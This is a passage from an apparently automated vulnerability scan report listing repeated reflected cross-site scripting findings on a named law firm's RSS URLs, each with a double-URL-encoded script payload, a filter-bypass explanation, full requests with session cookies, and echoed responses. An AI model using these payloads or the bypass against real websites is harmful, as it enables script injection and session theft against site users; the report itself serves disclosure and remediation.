There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232/Election_Law__Government_Ethics/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices8ddc1"><script>alert(1)</script>11d8c833232/Election_Law__Government_Ethics/rss.xml" value="">
...[SNIP]...

2.160. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3 was submitted in the REST URL parameter 3. This input was echoed as de06e"><script>alert(1)</script>97b01f23fb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Election_Law__Government_Ethicsde06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Election_Law__Government_Ethicsde06e"><script>alert(1)</script>97b01f23fb3/rss.xml" value="">
...[SNIP]...

2.161. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac was submitted in the REST URL parameter 4. This input was echoed as 6d35d"><script>alert(1)</script>1977a3e2ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Election_Law__Government_Ethics/rss.xml6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Election_Law__Government_Ethics/rss.xml6d35d"><script>alert(1)</script>1977a3e2ac" value="">
...[SNIP]...

2.162. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b was submitted in the REST URL parameter 1. This input was echoed as 290f3"><script>alert(1)</script>18476e2452b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b/practices/Employment__Labor/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss290f3"><script>alert(1)</script>18476e2452b/practices/Employment__Labor/rss.xml" value="">
...[SNIP]...

2.163. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732 was submitted in the REST URL parameter 2. This input was echoed as 9b5ec"><script>alert(1)</script>43dabe5a732 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732/Employment__Labor/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices9b5ec"><script>alert(1)</script>43dabe5a732/Employment__Labor/rss.xml" value="">
...[SNIP]...

2.164. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8 was submitted in the REST URL parameter 3. This input was echoed as e75a9"><script>alert(1)</script>28bea29faf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Employment__Labore75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Employment__Labore75a9"><script>alert(1)</script>28bea29faf8/rss.xml" value="">
...[SNIP]...

2.165. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db was submitted in the REST URL parameter 4. This input was echoed as 7e26b"><script>alert(1)</script>a05a8e876db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Employment__Labor/rss.xml7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Employment__Labor/rss.xml7e26b"><script>alert(1)</script>a05a8e876db" value="">
...[SNIP]...

2.166. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c was submitted in the REST URL parameter 1. This input was echoed as ac191"><script>alert(1)</script>408ea2dc39c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c/practices/Environment__Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssac191"><script>alert(1)</script>408ea2dc39c/practices/Environment__Safety/rss.xml" value="">
...[SNIP]...

2.167. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d was submitted in the REST URL parameter 2. This input was echoed as faef9"><script>alert(1)</script>09c7b47057d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesfaef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d/Environment__Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesfaef9"><script>alert(1)</script>09c7b47057d/Environment__Safety/rss.xml" value="">
...[SNIP]...

2.168. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872 was submitted in the REST URL parameter 3. This input was echoed as 14f97"><script>alert(1)</script>df3bd752872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Environment__Safety14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Environment__Safety14f97"><script>alert(1)</script>df3bd752872/rss.xml" value="">
...[SNIP]...

2.169. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 was submitted in the REST URL parameter 4. This input was echoed as a8458"><script>alert(1)</script>9d96a6b3a12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Environment__Safety/rss.xmla8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Environment__Safety/rss.xmla8458"><script>alert(1)</script>9d96a6b3a12" value="">
...[SNIP]...

2.170. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2 was submitted in the REST URL parameter 1. This input was echoed as 53bc2"><script>alert(1)</script>4c6054d33b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2/practices/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss53bc2"><script>alert(1)</script>4c6054d33b2/practices/Food__Drug_and_Product_Safety/rss.xml" value="">
...[SNIP]...

2.171. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82 was submitted in the REST URL parameter 2. This input was echoed as 99d18"><script>alert(1)</script>a1c0da64d82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices99d18"><script>alert(1)</script>a1c0da64d82/Food__Drug_and_Product_Safety/rss.xml" value="">
...[SNIP]...

2.172. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21 was submitted in the REST URL parameter 3. This input was echoed as de427"><script>alert(1)</script>3670bef0e21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Food__Drug_and_Product_Safetyde427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Food__Drug_and_Product_Safetyde427"><script>alert(1)</script>3670bef0e21/rss.xml" value="">
...[SNIP]...

2.173. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 was submitted in the REST URL parameter 4. This input was echoed as f92a2"><script>alert(1)</script>41efcd82b21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Food__Drug_and_Product_Safety/rss.xmlf92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
